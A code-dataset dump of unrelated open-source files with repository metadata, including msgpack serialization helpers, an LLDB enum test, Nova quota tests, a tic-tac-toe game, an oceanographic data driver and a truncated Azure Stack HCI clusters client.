|
Python
|
__init__.py
|
jqueguiner/haven
|
7b2a5d46b08f48f1112f8903f1b97c6adadff3f4
|
[
"Apache-2.0"
] | 26
|
2020-01-09T14:28:28.000Z
|
2020-08-09T08:03:08.000Z
|
__init__.py
|
jqueguiner/haven
|
7b2a5d46b08f48f1112f8903f1b97c6adadff3f4
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
jqueguiner/haven
|
7b2a5d46b08f48f1112f8903f1b97c6adadff3f4
|
[
"Apache-2.0"
] | 6
|
2020-02-11T19:43:50.000Z
|
2020-05-12T01:59:59.000Z
|
from .haven import haven_utils
from .haven import haven_results
from .haven import haven_jupyter
from .haven import haven_exps
from .haven import haven_chk
from .haven import haven_img
from .haven import haven_dropbox
| 24.333333
| 32
| 0.835616
|
c039b51732212190cef5f76d6d9aba6e1962511f
| 1,833
|
py
|
Python
|
bouser/helpers/msgpack_helpers.py
|
MarsStirner/bouser
|
33bf759448fec4340581f1cc44e7b0b23a2c4e7a
|
[
"0BSD"
] | null | null | null |
bouser/helpers/msgpack_helpers.py
|
MarsStirner/bouser
|
33bf759448fec4340581f1cc44e7b0b23a2c4e7a
|
[
"0BSD"
] | null | null | null |
bouser/helpers/msgpack_helpers.py
|
MarsStirner/bouser
|
33bf759448fec4340581f1cc44e7b0b23a2c4e7a
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import msgpack
__author__ = 'viruzzz-kun'
__created__ = '05.04.2015'
class Serializable(object):
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
def __encode_hook(obj):
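    # ExtType codes used below: 0 = set, 1 = Serializable (state restored via
    # __setstate__), 2 = plain instance state in __dict__, 3 = instance state
    # in __slots__.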
if isinstance(obj, set):
return msgpack.ExtType(0, dump(sorted(obj)))
elif isinstance(obj, Serializable):
return msgpack.ExtType(
1,
dump([
obj.__module__,
obj.__class__.__name__,
obj.__getstate__(),
]))
elif hasattr(obj, '__dict__'):
return msgpack.ExtType(
2,
dump([
obj.__module__,
obj.__class__.__name__,
obj.__dict__,
]))
elif hasattr(obj, '__slots__'):
return msgpack.ExtType(
3,
dump([
obj.__module__,
obj.__class__.__name__,
[getattr(obj, key) for key in obj.__slots__],
]))
return obj
def __ext_hook(code, data):
if code == 0:
return set(load(data))
elif code in (1, 2, 3):
mod, klass, state = load(data)
module = __import__(mod, globals(), locals(), [klass])
obj = getattr(module, klass)()
if code == 1:
obj.__setstate__(state)
elif code == 2:
obj.__dict__ = state
elif code == 3:
for key, value in zip(obj.__slots__, state):
setattr(obj, key, value)
return obj
return msgpack.ExtType(code, data)
def load(chunk, **kwargs):
return msgpack.unpackb(chunk, ext_hook=__ext_hook, encoding='utf-8', **kwargs)
def dump(o):
return msgpack.packb(o, default=__encode_hook, use_bin_type=True)
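# Minimal roundtrip sketch (illustrative): sets and Serializable objects survive a
# dump/load cycle via the ExtType hooks above. Assumes msgpack < 1.0, which still
# accepts the ``encoding`` keyword used by ``load``.
if __name__ == '__main__':
    class _Point(Serializable):
        def __init__(self, x=0, y=0):
            self.x = x
            self.y = y
    restored = load(dump({'tags': {'a', 'b'}, 'origin': _Point(1, 2)}))
    assert restored['tags'] == {'a', 'b'}
    assert (restored['origin'].x, restored['origin'].y) == (1, 2)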
| 25.816901
| 82
| 0.541735
|
64070a324a74c4673a96125f39182f87894e3897
| 250
|
py
|
Python
|
configs/unet/fcn_unet_s5-d16_128x128_40k_stare.py
|
sandylaker/mmsegmentation
|
1c96a89472804a1e7d4c4cbe8cd980617345d6c9
|
[
"Apache-2.0"
] | 5
|
2021-07-10T06:53:14.000Z
|
2021-12-20T09:52:48.000Z
|
configs/unet/fcn_unet_s5-d16_128x128_40k_stare.py
|
JPLAY0/mmsegmentation
|
b46bbfdeed127b1cab325f707c090014f9333c11
|
[
"Apache-2.0"
] | 2
|
2021-04-01T01:47:08.000Z
|
2022-03-18T05:10:53.000Z
|
configs/unet/fcn_unet_s5-d16_128x128_40k_stare.py
|
JPLAY0/mmsegmentation
|
b46bbfdeed127b1cab325f707c090014f9333c11
|
[
"Apache-2.0"
] | 1
|
2022-02-23T15:54:47.000Z
|
2022-02-23T15:54:47.000Z
|
_base_ = [
'../_base_/models/fcn_unet_s5-d16.py', '../_base_/datasets/stare.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_40k.py'
]
test_cfg = dict(crop_size=(128, 128), stride=(85, 85))
evaluation = dict(metric='mDice')
| 35.714286
| 73
| 0.676
|
ef746c4e6487de08be9034efadb6509247ef8f42
| 973
|
py
|
Python
|
old/find.py
|
ericsson-intern/mavenbox
|
9c8c0658fdefeff63444e817c6ca98b3c7c34fff
|
[
"Apache-2.0"
] | null | null | null |
old/find.py
|
ericsson-intern/mavenbox
|
9c8c0658fdefeff63444e817c6ca98b3c7c34fff
|
[
"Apache-2.0"
] | null | null | null |
old/find.py
|
ericsson-intern/mavenbox
|
9c8c0658fdefeff63444e817c6ca98b3c7c34fff
|
[
"Apache-2.0"
] | null | null | null |
import shutil as fs
import os
import sys
def search_files(directory='.', extension='', callback=None):
    extension = extension.lower()
    for dirpath, dirnames, files in os.walk(directory):
        for name in files:
            if extension and name.lower().endswith(extension):
                if callback is not None:
                    callback(dirpath, name)
            elif not extension:
                print(os.path.join(dirpath, name))
def p(a,b):
print(a,b)
search_files('pom','xml',p)
def main(*args):
    # NOTE: `commands`, `usage`, `validate_arguments` and `NoSuchCommandError` are
    # assumed to be defined elsewhere; they are referenced but not shown in this file.
    syntax = """Syntax: %s [%s] [command arguments]""" % (
        os.path.basename(args[0]), "|".join(commands.keys()))
    if len(args) < 2:
        usage(syntax)
    program_name, command_name = args[:2]
    arguments = args[2:]
    try:
        fun = commands[command_name]
    except KeyError:
        raise NoSuchCommandError("No such command: %s" % command_name)
    validate_arguments(fun, arguments, name=command_name)
    return fun(*arguments)
if __name__ == "__main__":
main(*sys.argv)
| 24.325
| 70
| 0.614594
|
a8a2f5f6b1bdbb09ec4f3d3cc6d66af901cec240
| 5,593
|
py
|
Python
|
packages/Python/lldbsuite/test/lang/cpp/enum_types/TestCPP11EnumTypes.py
|
nathawes/swift-lldb
|
3cbf7470e0f9191ec1fc1c69ce8048c1dc64ec77
|
[
"Apache-2.0"
] | 2
|
2019-05-24T14:10:24.000Z
|
2019-05-24T14:27:38.000Z
|
packages/Python/lldbsuite/test/lang/cpp/enum_types/TestCPP11EnumTypes.py
|
enterstudio/swift-lldb
|
af85d636d230da2460f91938b1ff734b0fb64b42
|
[
"Apache-2.0"
] | null | null | null |
packages/Python/lldbsuite/test/lang/cpp/enum_types/TestCPP11EnumTypes.py
|
enterstudio/swift-lldb
|
af85d636d230da2460f91938b1ff734b0fb64b42
|
[
"Apache-2.0"
] | null | null | null |
"""Look up enum type information and check for correct display."""
from __future__ import print_function
import os
import time
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class CPP11EnumTypesTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int8_t(self):
"""Test C++11 enumeration class types as int8_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int8_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int16_t(self):
"""Test C++11 enumeration class types as int16_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int16_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int32_t(self):
"""Test C++11 enumeration class types as int32_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int32_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int64_t(self):
"""Test C++11 enumeration class types as int64_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int64_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint8_t(self):
"""Test C++11 enumeration class types as uint8_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint8_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint16_t(self):
"""Test C++11 enumeration class types as uint16_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint16_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint32_t(self):
"""Test C++11 enumeration class types as uint32_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint32_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint64_t(self):
"""Test C++11 enumeration class types as uint64_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint64_t"'})
self.image_lookup_for_enum_type()
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.line = line_number('main.cpp', '// Set break point at this line.')
def image_lookup_for_enum_type(self):
"""Test C++11 enumeration class types."""
exe = self.getBuildArtifact("a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Break inside the main.
bkpt_id = lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# Look up information about the 'DayType' enum type.
# Check for correct display.
self.expect("image lookup -t DayType", DATA_TYPES_DISPLAYED_CORRECTLY,
patterns=['enum( struct| class)? DayType {'],
substrs=['Monday',
'Tuesday',
'Wednesday',
'Thursday',
'Friday',
'Saturday',
'Sunday',
'kNumDays',
'}'])
enum_values = ['-4',
'Monday',
'Tuesday',
'Wednesday',
'Thursday',
'Friday',
'Saturday',
'Sunday',
'kNumDays',
'5']
bkpt = self.target().FindBreakpointByID(bkpt_id)
for enum_value in enum_values:
self.expect(
"frame variable day",
'check for valid enumeration value',
substrs=[enum_value])
lldbutil.continue_to_breakpoint(self.process(), bkpt)
| 37.790541
| 82
| 0.57411
|
02781a7cd5f986c0787fc3b615769548146b294e
| 6,583
|
py
|
Python
|
nova/tests/unit/objects/test_quotas.py
|
gabriel-samfira/nova
|
5ef07cc04dbf0216452ae358e57d9ddac51f1803
|
[
"Apache-2.0"
] | 7
|
2015-09-22T11:27:16.000Z
|
2015-11-02T12:33:46.000Z
|
nova/tests/unit/objects/test_quotas.py
|
gabriel-samfira/nova
|
5ef07cc04dbf0216452ae358e57d9ddac51f1803
|
[
"Apache-2.0"
] | 2
|
2015-09-07T22:14:46.000Z
|
2020-08-12T08:51:56.000Z
|
nova/tests/unit/objects/test_quotas.py
|
gabriel-samfira/nova
|
5ef07cc04dbf0216452ae358e57d9ddac51f1803
|
[
"Apache-2.0"
] | 4
|
2017-06-23T07:37:43.000Z
|
2020-12-28T09:57:22.000Z
|
# Copyright 2013 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import context
from nova.objects import quotas as quotas_obj
from nova import quota
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_objects
QUOTAS = quota.QUOTAS
class TestQuotasModule(test.NoDBTestCase):
def setUp(self):
super(TestQuotasModule, self).setUp()
self.context = context.RequestContext('fake_user1', 'fake_proj1')
self.instance = fake_instance.fake_db_instance(
project_id='fake_proj2', user_id='fake_user2')
def test_ids_from_instance_non_admin(self):
project_id, user_id = quotas_obj.ids_from_instance(
self.context, self.instance)
self.assertEqual('fake_user2', user_id)
self.assertEqual('fake_proj1', project_id)
def test_ids_from_instance_admin(self):
project_id, user_id = quotas_obj.ids_from_instance(
self.context.elevated(), self.instance)
self.assertEqual('fake_user2', user_id)
self.assertEqual('fake_proj2', project_id)
class _TestQuotasObject(object):
def setUp(self):
super(_TestQuotasObject, self).setUp()
self.context = context.RequestContext('fake_user1', 'fake_proj1')
self.instance = fake_instance.fake_db_instance(
project_id='fake_proj2', user_id='fake_user2')
def test_from_reservations(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations)
self.assertEqual(self.context, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertIsNone(quotas.project_id)
self.assertIsNone(quotas.user_id)
def test_from_reservations_bogus(self):
fake_reservations = [_TestQuotasObject, _TestQuotasObject]
self.assertRaises(ValueError,
quotas_obj.Quotas.from_reservations,
self.context, fake_reservations)
def test_from_reservations_instance(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations,
instance=self.instance)
self.assertEqual(self.context, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertEqual('fake_proj1', quotas.project_id)
self.assertEqual('fake_user2', quotas.user_id)
def test_from_reservations_instance_admin(self):
fake_reservations = ['1', '2']
elevated = self.context.elevated()
quotas = quotas_obj.Quotas.from_reservations(
elevated, fake_reservations,
instance=self.instance)
self.assertEqual(elevated, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertEqual('fake_proj2', quotas.project_id)
self.assertEqual('fake_user2', quotas.user_id)
def test_reserve(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas()
self.mox.StubOutWithMock(QUOTAS, 'reserve')
QUOTAS.reserve(self.context, expire='expire',
project_id='project_id', user_id='user_id',
moo='cow').AndReturn(fake_reservations)
self.mox.ReplayAll()
quotas.reserve(self.context, expire='expire',
project_id='project_id', user_id='user_id',
moo='cow')
self.assertEqual(self.context, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertEqual('project_id', quotas.project_id)
self.assertEqual('user_id', quotas.user_id)
def test_commit(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations)
self.mox.StubOutWithMock(QUOTAS, 'commit')
QUOTAS.commit(self.context, fake_reservations,
project_id=None, user_id=None)
self.mox.ReplayAll()
quotas.commit()
self.assertIsNone(quotas.reservations)
def test_commit_none_reservations(self):
quotas = quotas_obj.Quotas.from_reservations(self.context, None)
self.mox.StubOutWithMock(QUOTAS, 'commit')
self.mox.ReplayAll()
quotas.commit()
def test_rollback(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations)
self.mox.StubOutWithMock(QUOTAS, 'rollback')
QUOTAS.rollback(self.context, fake_reservations,
project_id=None, user_id=None)
self.mox.ReplayAll()
quotas.rollback()
self.assertIsNone(quotas.reservations)
def test_rollback_none_reservations(self):
quotas = quotas_obj.Quotas.from_reservations(self.context, None)
self.mox.StubOutWithMock(QUOTAS, 'rollback')
self.mox.ReplayAll()
quotas.rollback()
@mock.patch('nova.db.quota_create')
def test_create_limit(self, mock_create):
quotas_obj.Quotas.create_limit(self.context, 'fake-project',
'foo', 10, user_id='user')
mock_create.assert_called_once_with(self.context, 'fake-project',
'foo', 10, user_id='user')
@mock.patch('nova.db.quota_update')
def test_update_limit(self, mock_update):
quotas_obj.Quotas.update_limit(self.context, 'fake-project',
'foo', 10, user_id='user')
mock_update.assert_called_once_with(self.context, 'fake-project',
'foo', 10, user_id='user')
class TestQuotasObject(_TestQuotasObject, test_objects._LocalTest):
pass
class TestRemoteQuotasObject(_TestQuotasObject, test_objects._RemoteTest):
pass
| 39.184524
| 78
| 0.658818
|
561d19607fa6cbc6ec10027b2fef966711617f3b
| 2,824
|
py
|
Python
|
pychron/core/ui/qt/gui.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 1
|
2019-02-27T21:57:44.000Z
|
2019-02-27T21:57:44.000Z
|
pychron/core/ui/qt/gui.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 80
|
2018-07-17T20:10:20.000Z
|
2021-08-17T15:38:24.000Z
|
pychron/core/ui/qt/gui.py
|
AGESLDEO/pychron
|
1a81e05d9fba43b797f335ceff6837c016633bcf
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
# ============= local library imports ==========================
import math
"""
http://stackoverflow.com/questions/10991991/pyside-easier-way-of-updating-gui-from-another-thread
"""
#
#
# class InvokeEvent(QtCore.QEvent):
# EVENT_TYPE = QtCore.QEvent.Type(QtCore.QEvent.registerEventType())
#
# def __init__(self, fn, *args, **kwargs):
# QtCore.QEvent.__init__(self, InvokeEvent.EVENT_TYPE)
# self.fn = fn
# self.args = args
# self.kwargs = kwargs
#
#
# class Invoker(QtCore.QObject):
# def event(self, event):
# event.fn(*event.args, **event.kwargs)
# return True
#
#
# _invoker = Invoker()
#
# def invoke_in_main_thread(fn, *args, **kwargs):
# QtCore.QCoreApplication.postEvent(_invoker, InvokeEvent(fn, *args, **kwargs), QtCore.Qt.NormalEventPriority)
# QtCore.QCoreApplication.sendPostedEvents(_invoker)
# QtCore.QCoreApplication.processEvents()
# def invoke_in_main_thread(fn, *args, **kw):
# from pyface.gui import GUI
# GUI.invoke_later(fn, *args, **kw)
def convert_color(color, output='rgbF'):
    from pyface.qt.QtGui import QColor
    if isinstance(color, QColor):
        rgb = color.red(), color.green(), color.blue()
        if output == 'rgbaF':
            # include the alpha channel; the 'rgbF' branch previously
            # returned the same three components for both output modes
            args = rgb + (color.alpha(),)
        else:  # 'rgbF' (default)
            args = rgb
        return [x / 255. for x in args]
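# A minimal usage sketch for convert_color (assumes a Qt binding is installed;
# the color values are illustrative):
#
#     >>> from pyface.qt.QtGui import QColor
#     >>> convert_color(QColor(255, 0, 0))                   # 'rgbF'
#     [1.0, 0.0, 0.0]
#     >>> convert_color(QColor(255, 0, 0), output='rgbaF')   # with alpha
#     [1.0, 0.0, 0.0, 1.0]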
def wake_screen():
import random, time
from pyface.qt.QtGui import QCursor
time.sleep(5)
q = QCursor()
pos = q.pos()
ox, oy = pos.x(), pos.y()
def rgen():
r = 300
while 1:
theta = math.radians(random.random() * 360)
x = r * math.cos(theta)
y = r * math.sin(theta)
yield ox + x, oy + y
random_point = rgen()
for i in range(5):
x, y = next(random_point)
q.setPos(x, y)
time.sleep(0.1)
q.setPos(ox, oy)
# ============= EOF =============================================
| 28.525253
| 114
| 0.566572
|
2b694ad0a207e81e69b458b6b45db42af9919c95
| 3,591
|
py
|
Python
|
Test.py
|
JamesTaylor-creator/Tic-Tac-Toe-COSC-1436-301
|
ad7ad16bbcb85d2baccc485d30ca127081a1c4f2
|
[
"MIT"
] | 1
|
2021-03-24T22:35:11.000Z
|
2021-03-24T22:35:11.000Z
|
Test.py
|
JamesTaylor-creator/Tic-Tac-Toe-COSC-1436-301
|
ad7ad16bbcb85d2baccc485d30ca127081a1c4f2
|
[
"MIT"
] | 2
|
2021-04-08T16:31:00.000Z
|
2021-04-17T02:34:20.000Z
|
Test.py
|
JamesTaylor-creator/Tic-Tac-Toe-COSC-1436-301
|
ad7ad16bbcb85d2baccc485d30ca127081a1c4f2
|
[
"MIT"
] | 1
|
2021-03-25T01:54:15.000Z
|
2021-03-25T01:54:15.000Z
|
class my_class(object):
pass
# Tic Tac Toe game in Python
board = [' ' for x in range(10)]
def insertLetter(letter, pos):
board[pos] = letter
def spaceIsFree(pos):
return board[pos] == ' '
def printBoard(board):
print(' | |')
print(' ' + board[1] + ' | ' + board[2] + ' | ' + board[3])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[4] + ' | ' + board[5] + ' | ' + board[6])
print(' | |')
print('-----------')
print(' | |')
print(' ' + board[7] + ' | ' + board[8] + ' | ' + board[9])
print(' | |')
def isWinner(bo, le):
    return ((bo[7] == le and bo[8] == le and bo[9] == le) or   # bottom row
            (bo[4] == le and bo[5] == le and bo[6] == le) or   # middle row
            (bo[1] == le and bo[2] == le and bo[3] == le) or   # top row
            (bo[1] == le and bo[4] == le and bo[7] == le) or   # left column
            (bo[2] == le and bo[5] == le and bo[8] == le) or   # middle column
            (bo[3] == le and bo[6] == le and bo[9] == le) or   # right column
            (bo[1] == le and bo[5] == le and bo[9] == le) or   # diagonal
            (bo[3] == le and bo[5] == le and bo[7] == le))     # anti-diagonal
def playerMove():
run = True
while run:
move = input('Please select a position to place an \'X\' (1-9): ')
try:
move = int(move)
if move > 0 and move < 10:
if spaceIsFree(move):
run = False
insertLetter('X', move)
else:
print('Sorry, this space is occupied!')
else:
print('Please type a number within the range!')
except:
print('Please type a number!')
def compMove():
possibleMoves = [x for x, letter in enumerate(board) if letter == ' ' and x != 0]
move = 0
for let in ['O', 'X']:
for i in possibleMoves:
boardCopy = board[:]
boardCopy[i] = let
if isWinner(boardCopy, let):
move = i
return move
cornersOpen = []
for i in possibleMoves:
if i in [1,3,7,9]:
cornersOpen.append(i)
if len(cornersOpen) > 0:
move = selectRandom(cornersOpen)
return move
if 5 in possibleMoves:
move = 5
return move
edgesOpen = []
for i in possibleMoves:
if i in [2,4,6,8]:
edgesOpen.append(i)
if len(edgesOpen) > 0:
move = selectRandom(edgesOpen)
return move
def selectRandom(li):
import random
ln = len(li)
r = random.randrange(0,ln)
return li[r]
def isBoardFull(board):
if board.count(' ') > 1:
return False
else:
return True
def main():
print('Welcome to Tic Tac Toe!')
printBoard(board)
while not(isBoardFull(board)):
if not(isWinner(board, 'O')):
playerMove()
printBoard(board)
else:
print('Sorry, O\'s won this time!')
break
if not(isWinner(board, 'X')):
move = compMove()
if move == 0:
print('Tie Game!')
else:
insertLetter('O', move)
print('Computer placed an \'O\' in position', move , ':')
printBoard(board)
else:
print('X\'s won this time! Good Job!')
break
if isBoardFull(board):
print('Tie Game!')
main()
while True:
    answer = input('Do you want to play again? (Y/N)')
    if answer.lower() == 'y' or answer.lower() == 'yes':
        board = [' ' for x in range(10)]
        print('-----------------------------------')
        main()
    else:
        break
| 27
| 393
| 0.465887
|
51b737d01fef41f5cb65d16e821995c9a4f78657
| 1,250
|
py
|
Python
|
mi/dataset/driver/presf_abc/dcl/presf_abc_dcl_telemetered_driver.py
|
petercable/mi-dataset
|
d3c1607ea31af85fbba5719a31d4a60bf39f8dd3
|
[
"BSD-2-Clause"
] | 1
|
2018-09-14T23:28:29.000Z
|
2018-09-14T23:28:29.000Z
|
mi/dataset/driver/presf_abc/dcl/presf_abc_dcl_telemetered_driver.py
|
petercable/mi-dataset
|
d3c1607ea31af85fbba5719a31d4a60bf39f8dd3
|
[
"BSD-2-Clause"
] | 33
|
2017-04-25T19:53:45.000Z
|
2022-03-18T17:42:18.000Z
|
mi/dataset/driver/presf_abc/dcl/presf_abc_dcl_telemetered_driver.py
|
petercable/mi-dataset
|
d3c1607ea31af85fbba5719a31d4a60bf39f8dd3
|
[
"BSD-2-Clause"
] | 31
|
2015-03-04T01:01:09.000Z
|
2020-10-28T14:42:12.000Z
|
#!/usr/local/bin/python2.7
##
# OOIPLACEHOLDER
#
# Copyright 2014 Raytheon Co.
##
__author__ = 'Jeff Roy'
from mi.dataset.dataset_driver import SimpleDatasetDriver
from mi.dataset.parser.presf_abc_dcl import PresfAbcDclParser
from mi.core.versioning import version
@version("15.6.1")
def parse(unused, source_file_path, particle_data_handler):
"""
This is the method called by Uframe
:param unused
:param source_file_path This is the full path and filename of the file to be parsed
:param particle_data_handler Java Object to consume the output of the parser
:return particle_data_handler
"""
with open(source_file_path, 'rU') as stream_handle:
        # create an instance of the concrete driver class defined below
driver = PresfAbcDclTelemeteredDriver(unused, stream_handle, particle_data_handler)
driver.processFileStream()
return particle_data_handler
class PresfAbcDclTelemeteredDriver(SimpleDatasetDriver):
"""
Derived presf_abc_dcl driver class
All this needs to do is create a concrete _build_parser method
"""
def _build_parser(self, stream_handle):
parser = PresfAbcDclParser(stream_handle, self._exception_callback, True)
return parser
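# A hedged usage sketch (the handler class and file path below are illustrative
# assumptions, not taken from this file):
#
#     >>> from mi.dataset.dataset_driver import ParticleDataHandler
#     >>> handler = parse(None, '/tmp/presf_abc_dcl.log', ParticleDataHandler())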
| 27.173913
| 91
| 0.7488
|
337cbb9d118bcd4fec8dd85e9549dde40a651344
| 20,827
|
py
|
Python
|
src/stack-hci/azext_stack_hci/vendored_sdks/azurestackhci/aio/operations/_clusters_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/stack-hci/azext_stack_hci/vendored_sdks/azurestackhci/aio/operations/_clusters_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/stack-hci/azext_stack_hci/vendored_sdks/azurestackhci/aio/operations/_clusters_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ClustersOperations:
"""ClustersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.azurestackhci.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_subscription(
self,
**kwargs
) -> AsyncIterable["_models.ClusterList"]:
"""List all HCI clusters in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ClusterList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.azurestackhci.models.ClusterList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ClusterList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ClusterList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
